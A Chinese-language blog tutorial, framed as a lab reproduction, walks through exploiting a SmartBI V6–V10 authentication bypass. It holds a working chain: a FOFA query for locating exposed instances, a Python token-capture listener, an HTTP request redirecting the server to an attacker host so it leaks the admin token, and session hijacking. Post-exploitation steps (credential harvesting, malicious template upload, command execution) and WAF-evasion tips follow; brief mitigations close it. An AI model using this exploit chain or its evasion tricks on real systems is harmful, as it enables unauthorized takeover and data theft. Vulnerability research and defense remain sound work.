,从获取token到接管后台的完整过程)
实战复现SmartBI权限绕过漏洞:从Token获取到后台接管全流程解析
在企业级数据分析平台中,权限控制是安全架构的核心环节。近期曝光的SmartBI V6-V10版本权限绕过漏洞,因其利用链清晰且危害性高,成为安全研究人员关注的焦点。本文将采用实验室环境,逐步拆解漏洞利用的完整过程,帮助读者深入理解认证机制缺陷的实战利用方式。
1. 环境搭建与漏洞原理剖析
1.1 实验环境配置
复现漏洞需要准备以下组件:
- SmartBI V10测试版(官方已停止旧版下载,可从镜像站获取历史版本)
- Kali Linux攻击机(预装Python3、Burp Suite)
- 测试用Windows Server 2019主机
- 网络拓扑需确保攻击机与靶机双向可达
关键配置参数:
| 组件 | 版本要求 | 备注 |
|---|---|---|
| SmartBI | 6.0 ≤ 版本 ≤ 10.0 | 需关闭自动更新 |
| Java环境 | JDK 8u201 | 避免高版本兼容性问题 |
| Web容器 | Tomcat 9.0.40 | 需禁用PUT/DELETE方法 |
注意:实验环境应使用NAT网络隔离,避免意外暴露到公网。实际测试时,建议在虚拟机快照后操作。
1.2 漏洞形成机制
该漏洞本质是API接口的认证逻辑缺陷。监控模块的/smartbix/api/monitor接口未校验调用者身份,导致攻击者可:
- 篡改内部引擎地址指向恶意服务器
- 诱导系统向攻击者服务器发送认证Token
- 通过Token反连获取管理员会话
# 漏洞触发流程图 1. 未授权访问监控API → 2. 修改engineAddress参数 → 3. 系统主动连接攻击者主机 → 4. 泄漏Token信息 → 5. 会话劫持2. 漏洞利用链分步实施
2.1 初始信息收集
使用FOFA引擎识别潜在目标(实验环境需手动部署):
# FOFA语法示例(实际测试请替换为内网IP) app="SMARTBI" && country="CN"通过目录扫描发现关键接口:
/smartbi/smartbix/api/monitor/engineInfo /smartbi/smartbix/api/monitor/token2.2 搭建恶意监听服务
编写Python HTTP服务器接收Token:
from http.server import BaseHTTPRequestHandler, HTTPServer import json class TokenHandler(BaseHTTPRequestHandler): def do_POST(self): content_len = int(self.headers.get('Content-Length')) post_data = self.rfile.read(content_len) print(f"\n[+] Received Token: {post_data.decode()}") self.send_response(200) self.send_header('Content-type', 'application/json') self.end_headers() self.wfile.write(json.dumps({"status":"success"}).encode()) if __name__ == '__main__': server = HTTPServer(('0.0.0.0', 8000), TokenHandler) print("[*] Token listener started on port 8000") server.serve_forever()保存为token_server.py后执行:
python3 token_server.py2.3 分阶段攻击实施
第一阶段:重定向引擎地址
POST /smartbi/smartbix/api/monitor/setEngineAddress HTTP/1.1 Host: 192.168.1.100 Content-Type: application/json Content-Length: 38 {"address":"http://攻击者IP:8000"}第二阶段:触发Token泄漏
等待约30秒后,系统会自动向攻击者服务器发送心跳包,其中包含认证Token。观察Python服务端输出:
[+] Received Token: {"token":"eyJhbG...","user":"admin"}第三阶段:会话劫持
使用获取的Token构造管理会话:
POST /smartbi/smartbix/api/monitor/login HTTP/1.1 Host: 192.168.1.100 Content-Type: application/json Cookie: SMARTBI_TOKEN=eyJhbG... {"action":"validate"}成功响应后将返回管理员权限的JSESSIONID。
3. 权限维持与防御绕过
3.1 后台功能探查
获取管理员权限后,可执行以下高危操作:
- 数据源连接管理(直连数据库)
- 报表模板上传(可能触发XXE)
- 系统命令执行接口(部分版本存在)
典型后渗透路径:
- 通过"系统管理 → 数据源配置"获取数据库凭证
- 利用"报表导入"功能上传恶意模板文件
- 访问
/smartbi/servlet/DesignService执行系统命令
3.2 流量隐蔽技巧
为避免触发WAF规则,建议:
- 对API路径进行URL编码
- 使用合法的Referer头
- 控制请求频率在5-10秒/次
POST /smartbi/smartbix%2fapi%2fmonitor%2fsetEngineAddress HTTP/1.1 Referer: https://192.168.1.100/smartbi/vision/index.jsp4. 防御方案与检测建议
4.1 临时缓解措施
对于无法立即升级的系统,建议:
网络层控制:
- 限制
/smartbix/api/monitor接口的访问IP - 出站流量白名单控制
- 限制
应用层加固:
<!-- 在web.xml中添加 --> <security-constraint> <web-resource-collection> <url-pattern>/smartbix/api/monitor/*</url-pattern> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint>4.2 长期防护策略
- 启用SmartBI的二次认证功能
- 定期审计API接口权限
- 部署RASP防护对异常Token生成行为进行阻断
在测试过程中发现,当系统配置了严格的CORS策略时,攻击链的成功率会显著降低。这提示我们在实际防御中,应组合多种安全机制形成纵深防护。
